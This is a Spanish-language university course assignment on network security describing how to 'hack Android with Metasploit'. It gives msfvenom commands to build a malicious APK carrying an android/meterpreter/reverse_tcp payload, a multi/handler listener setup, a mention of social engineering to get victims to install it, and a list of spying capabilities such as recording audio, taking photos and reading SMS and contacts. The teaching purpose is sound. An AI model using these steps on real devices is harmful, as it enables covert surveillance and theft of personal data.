Sei sulla pagina 1di 6

Universidad Nacional Autónoma de Nicaragua

UNAN-LEÓN

Carrera: Ingeniería en sistemas de la información.


Componente: Introducción a la seguridad en redes
Tema: Hackeando Android con Metasploit
Profesor: Dennis Espinoza
Grupo: 1.
Fecha: 12 de julio del 2017.

Integrante
Br. María Narváez Argeñal.
Br. Luis Ángel Vallecillo Dávila

¡A la libertad por la Universidad!


Metasploit es un proyecto open source de seguridad informática que proporciona información
acerca de vulnerabilidades de seguridad y resulta muy útil durante los tests de penetración o
pentesting. El proyecto más conocido es el Metasploit Framework, una herramienta para
desarrollar y ejecutar exploits (fragmento de software, fragmento de datos o secuencia de
comandos y/o acciones utilizada con el fin de aprovechar una vulnerabilidad de seguridad de
un sistema de información) contra una máquina remota. Otras de las funcionalidades de esta
herramienta son: base de datos de payload, herramientas para recolectar información y
escanear en busca de vulnerabilidades.

Los pasos básicos a seguir para explotar vulnerabilidades usando Metasploit son:

 Elegir y configurar el exploit (como hemos dicho, código que permite explotar la
vulnerabilidad de un sistema).
 Confirmar si el objetivo es susceptible al exploit elegido (este paso es opcional).
 Elegir y configurar el payload (código que se ejecuta una vez explotemos la
vulnerabilidad).
 Elegir la técnica de encode o codificación para que el payload no sea detectados
por los elementos de seguridad del equipo (también es opcional aunque
recomendable).
 Ejecutar el exploit.

Para la realización de éstas y otras acciones, metasploit incorpora las siguientes


herramientas:

 msfconsole: línea de comandos de Metasploit.


 msfcli: interfaz que permite lanzar un módulo concreto mediante su configuración
en la misma ejecución de la aplicación.
 msfgui: interfaz gráfica de Metasploit.
 msfd: servicio que queda a la escucha de recibir conexiones para ofrecer una línea
de comandos en remoto.
 msfbinscan: permite realizar búsquedas en ejecutables de instrucciones de salto,
instrucciones POP
 msfpescan: permite realizar un análisis sobre DLLs y obtener la dirección de
retorno deseada para que la shellcode se ejecute.
 msfpayload: permite generar payloads en distintos lenguajes de programación,
pudiendo embeberlos en ejecutables Windows o binarios de UNIX.
 msfencode: permite ofuscar el código del payload para evitar su detección.
 msfvenom: es la unión de msfpayload y msfencode.
 msfupdate: se utiliza para actualizar el framework.

Además de estas herramientas, metasploit se compone de distintos módulos. Estos


módulos son:
 Módulo auxiliary: permite la interacción de herramientas externas, como pueden
ser escaners de vulnerabilidades, sniffers.
 Módulo encoders: nos proporciona los diferentes algoritmos para codificar y
ofuscar los payloads.
 Módulo exploits: aquí se encuentran todos los exploits disponibles en el
framework.
 Módulo payloads: multitud de códigos que se ejecutan una vez tenga éxito el
exploit.
 Módulo post: funcionalidades para la fase de post explotación durante un
pentesting.
 Módulo nops: permite realizar u obtener operaciones nop.

Explotando vulnerabilidad Android.

Como es de público conocimiento el sistema operativo Android cubre aproximadamente


el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante
mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la
seguridad de los dispositivos y de la información que un usuario expone en sus
dispositivos.

Con un par de simples líneas de comandos y un poco de ingeniería social podemos


acceder a un dispositivo Android.

NECESITAMOS:

1. 1 Máquina Virtual con KALI (vamos a usar Metasploit)


2. 1 Máquina Virtual con Android o 1 Dispositivo android

Creamos el archivo malicioso, para eso usamos MSFVENOM desde una


terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI


LPORT=Puerto_KALI R > /Escritorio/AplicacionMaliciosa.apk

- msfvenom es la unión de msfpayload y msfencode, msfpayload se encarga de


generar payloads para distintas plataformas, mientras que msfencode se encarga
de codificar dichos payloads con el objetivo de evadir la detección mediante el
uso de antivirus.

- Mediante el flag -p especificaremos que se hará uso de un Payload con el cual


atacaremos nuestro télefono objetivo, en nuestro caso: meterpreter.

- Payload es una funcion que posee cierta amenaza en particular. Refiera a


acciones adicionales, incluidas en virus, gusanos y troyanos. Un payload no es
necesariamente maligno, sino que se refiere también a efectos secundarios
nocivos para el ordenador
- Lo siguiente en este comando ha sido seleccionar el Stager (es responsable de
descargar una payload (la etapa), inyectándola en la memoria, y pasando la
ejecución a ella.) a utilizar, en este caso hemos usado reverse_tcp, el cual nos
permitirá reservar una zona en memoria y realizar una conexión. En esta zona es
donde se guarda el Payload que generaremos.

- LHOST y LPORT son básicamente la ip y puerto donde recibiremos los datos


enviados remotamente por el telefono atacado. EL Puerto puede ser a elección
propia, en este caso se escogió el Puerto 443 de manera aleatoria.

- Finalmente mediante el flag R > <lugar donde guardaremos el


apk>/<nombre apk>.apk, especificaremos donde quedará alojado nuestro
apk y el nombre de este.

(Opcional)
msfvenom: Indicará que utilizaremos Metasploit para el ataque.
-p: Indica a msfvenom que utilizaremos un payload.
android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una
conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con
nosotros una sesión en Meterpreter.
lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que
nos da el Router para identificarnos dentro del host.
lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos
normalmente usados como 80,4444, ya que puede estar siendo utilizado.

En nuestro caso quedara de la siguiente manera.

Lo próximo es dejar “escuchando” desde KALI hasta que la víctima ejecute la


aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente
manera:
msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP_KALI

set LPORT Puerto_KALI

exploit

Con esto tenemos una sesión de Meterpreter conectada hacia nuestra víctima, en este
caso se puede ver que el comando “sysinfo”
Con el comando HELP podemos ver qué acciones podemos hacer en el
dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores,
pero las acciones particulares de Android son:

 Grabar con el Micrófono


 Tomar Fotos con ambas cámaras (Frontal y Trasera)
 Hacer Streming desde la cámara seleccionada
 Verificar si el dispositivo es ROOTEADO
 Obtener el listado de llamadas
 Obtener el listado de Contactos
 Obtener los SMS
 Obtener la Ubicación del Dispositivo
 Enviar SMS
 Entre otras más cosas…

Potrebbero piacerti anche